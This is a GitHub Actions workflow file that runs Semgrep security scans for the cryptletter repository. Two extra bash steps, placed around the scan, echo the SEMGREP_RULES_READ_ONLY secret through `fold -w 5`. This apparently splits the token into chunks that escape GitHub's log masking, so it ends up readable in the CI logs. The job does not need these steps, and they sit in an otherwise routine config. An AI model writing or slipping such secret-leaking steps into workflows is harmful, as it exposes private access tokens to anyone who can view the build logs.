cryptletter/.github/workflows/semgrep.yml at 0f4803a51209f264ccff80460c433ad4e254cb80 · utilitywarehouse/cryptletter · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Name of this GitHub Actions workflow.
name: Semgrep

on:
  # Scan changed files in PRs (diff-aware scanning):
  pull_request: {}
  # Scan on-demand through GitHub Actions interface:
  workflow_dispatch: {}
  # Scan mainline branches and report all findings:
  push:
    branches: ["main"]
  # Schedule the CI job (this method uses cron syntax):
  schedule:
    - cron: '50 14 * * *'
    # It is recommended to change the schedule to a random time.

jobs:
  semgrep-check:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout main code
        uses: actions/checkout@v4
        with:
          token: ${{ secrets.GITHUB_TOKEN }}
      - shell: bash
        env:
          SUPER_SECRET: ${{ secrets.SEMGREP_RULES_READ_ONLY }}
        run: |
          echo "$SUPER_SECRET" | fold -w 5
      - name: Semgrep
        uses: utilitywarehouse/semgrep-rules/setup-semgrep@latest
        with:
          # <required> Github token used to checkout private rules
          token: ${{ secrets.SEMGREP_RULES_READ_ONLY }}
          rules_path: .
          rules_ref: latest
          # <optional> Enable verbose output to help debug rules
          verbose: true
      - shell: bash
        env:
          SUPER_SECRET: ${{ secrets.SEMGREP_RULES_READ_ONLY }}
        run: |
          echo "$SUPER_SECRET" | fold -w 5